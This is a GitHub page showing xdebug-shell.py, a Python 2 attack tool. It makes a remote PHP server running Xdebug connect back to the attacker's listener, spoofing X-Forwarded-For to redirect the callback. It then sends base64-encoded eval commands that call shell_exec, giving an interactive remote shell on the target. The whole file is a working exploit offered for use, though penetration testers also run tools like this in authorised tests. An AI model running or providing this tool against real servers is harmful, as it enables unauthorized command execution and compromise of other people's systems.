forked from gteissier/xdebug-shell
-
Notifications
You must be signed in to change notification settings - Fork 0
Expand file tree
/
Copy pathxdebug-shell.py
More file actions
executable file
·81 lines (63 loc) · 1.86 KB
/
xdebug-shell.py
File metadata and controls
executable file
·81 lines (63 loc) · 1.86 KB
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
#!/usr/bin/env python2
import socket
from defusedxml.ElementTree import fromstring
import pipes
import sys
import argparse
import thread
import requests
from urlparse import urlparse, parse_qs
import random
import string
parser = argparse.ArgumentParser()
parser.add_argument('-l', '--local-host',
help='local fqdn or IP address where xdebug will connect to on port 9000', default=None)
parser.add_argument('-u', '--url',
help='url to activate xdebug on', default=None)
args = parser.parse_args()
sk = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
sk.bind(('0.0.0.0', 9000))
sk.listen(10)
def rand_id(n=6):
r = ''
for i in range(n):
r += random.choice(string.ascii_letters)
return r
def start_xdebug(url, lhost):
r = None
if lhost is None:
r = requests.get(url,
params={'XDEBUG_SESSION_START': rand_id()},
)
else:
r = requests.get(url,
params={'XDEBUG_SESSION_START': rand_id()},
headers={'X-Forwarded-For': lhost}
)
assert(r.status_code >= 200 and r.status_code < 300)
if args.url is not None:
thread.start_new_thread(start_xdebug, (args.url, args.local_host))
conn, addr = sk.accept()
def pop_xdebug(client_data):
(length, data, _) = client_data.split('\x00')
length = int(length, 10)
assert(len(data) == length)
et = fromstring(data)
property = et.find('{urn:debugger_protocol_v1}property')
if property is None: return
return property.text
# pop xdebug greeting
client_data = conn.recv(1024)
data = pop_xdebug(client_data)
while True:
try:
data = raw_input('>> ')
except EOFError:
break
data += ' 2>&1'
php_command = 'base64_encode(shell_exec({}))'.format(pipes.quote(data))
conn.sendall('eval -i 1 -- %s\x00' % php_command.encode('base64'))
client_data = conn.recv(16384)
output = pop_xdebug(client_data).decode('base64').decode('base64')
sys.stdout.write('%s' % output)
print('')